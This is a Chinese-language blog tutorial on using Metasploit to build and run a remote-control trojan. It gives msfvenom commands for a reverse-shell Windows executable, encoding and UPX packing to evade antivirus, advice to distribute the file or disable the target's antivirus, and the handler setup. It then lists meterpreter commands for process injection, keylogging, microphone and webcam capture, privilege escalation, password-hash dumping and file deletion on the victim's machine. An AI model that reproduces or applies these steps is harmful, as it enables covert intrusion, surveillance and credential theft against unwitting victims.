Metasploit远程控制木马

发表于 | 分类于 | 评论数:

Metasploit远程控制软件,及木马的使用

基础小知识:木马:- 1. 控制端(控制程序) - 2.服务端(木马程序)so 要进行木马攻击必须要先根据自己的IP生成一个木马

  • 1.打开终端,输入

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.43.80 LPORT=55555 X > test.exe
    ‘X’ —-以二进制显示出来
    ‘>’ —-“写”的意思
    生成一个木马程序test.exe
    • 更新了kali了,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode

    • kali2.0之后的可以使用以下命令

      msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
// -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式

      • 还可以使用UPX加壳,做免杀处理,命令如下

        upx -5 /root/Desktop/acn.exe

  • 2.将生成的木马程序发布出去,在根目录下找到即可。现在杀毒软件会发现并将其隔离,如果不想被发现,可以做免杀处理,如果不想做免杀处理,把目标机的杀毒软件关掉就可以拖进去了

  • 3.打开另一个终端,输入

    msfconsole
    启动metasploit

  • 4.在msf下输入

    use exploit/multi/handler

  • 5.查看需要设置的参数

    show options

  • 6.设置payload

    set PAYLOAD windows/meterpreter/reverse_tcp
    使用这个shellcode程序

  • 7.查看参数设置

    show options

  • 8.设置LHOST,LPORT

    set LHOST 192.168.43.80
set LPORT 55555

  • 9.执行程序

    exploit
    生成一个等待连接会话,等待有人点击木马程序,当被攻击者点击之后生成
    meterpreter >
    这样一个等待输入的状态,可以进行一系列邪恶的操作
    例如查看系统
    meterpreter > sysinfo
    获取shell
    meterpreter > shell

先执行msf,后执行木马,如何使用工具

help      //查看帮助

  • 1.将自己暂时不用的会话放在后台

    background
    如何返回刚才的会话
    sessions -l         //查看会话
sessions -i 1       //选择刚才的会话,数字‘1’视情况而定

  • 2.进程注入(木马随时有可能被结束掉)

    meterpreter > ps        //得到要注入的PID进程
    经过查看得到桌面管理进程:2036 2004 explorer.exe
    meterpreter > migrate 2036     //注入

  • 3.远程桌面的开启

    meterpreter > run vuc

  • 4.系统文件管理功能

    meterpreter > XXXXXX

XXXXXX          //功能

download        //下载文件
edit            //编辑文件(vim编辑器的使用)
cat             //查看文件
mkdir           //创建文件
mv              //移动文件
rm              //删除文件
upload          //上传文件
rmdir           //删除文件夹
vim编辑器的使用:’i’ 开始编辑 —esc键:退出编辑状态—-shift+:并输入wq(保存并退出)

  • 5.网络和系统操作

    meterpreter > XXXXX

XXXXX          //功能

arp            //看arp缓冲表
ifconfig       //看IP地址及网卡
getproxy       //获取代理
netstat ·      //查看端口链接

kill  +代号    //结束进程(ps查看)
ps             //查看进程
reboot         //重启电脑
reg            //修改注册表
shell          //获取shell
shutdown       //关闭电脑
sysinfo        //获取电脑信息

  • 6.用户接口操作及摄像头操作

    meterpreter > XXXXXX

XXXXXX              //功能
enumdesktops        //用户登录数
keyscan_start       //键盘记录开始(第一步)
keyscan_dump        //键盘记录下载(第二步)
keyscan_stop        //键盘记录停止(第三步)
uictl               //获取键盘鼠标控制权(使用方法加“-h”查看)
record_mic          //音频录制(-d 可以自己设置时间长短,默认1秒)
webcam_chat         //查看摄像头接口
webcam_list         //查看摄像头列表
webcam_stream       //摄像头视频获取
getsystem           //获取高权限
hashdump            //下载hash密文
    如何用命令行查看视频与音频文件
    apt-get install mplayer
mplayer XXXXXX(播放文件)
-------------本文结束感谢您的阅读-------------
0%